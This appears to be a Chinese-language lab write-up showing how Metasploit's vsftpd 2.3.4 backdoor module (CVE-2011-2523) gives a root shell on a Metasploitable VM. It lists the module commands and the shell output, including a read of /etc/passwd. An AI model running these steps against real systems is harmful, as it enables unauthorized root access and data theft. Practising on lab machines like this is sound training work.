使用 Metasploit 利用
vsftpd 2.3.4中的已知漏洞进行攻击。
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 包含一个恶意后门,当收到以 :) 结尾的特制用户名时,会在 6200 端口打开一个命令 Shell。
CVE:CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
Root Shell 访问权限使攻击者能够完全控制目标系统——包括权限提升、横向移动、数据窃取和持久化访问。
📝 本仓库中提供完整 PDF 报告:vsftpd-exploit-report.pdf
由 vedpakhare 用 🔥 制作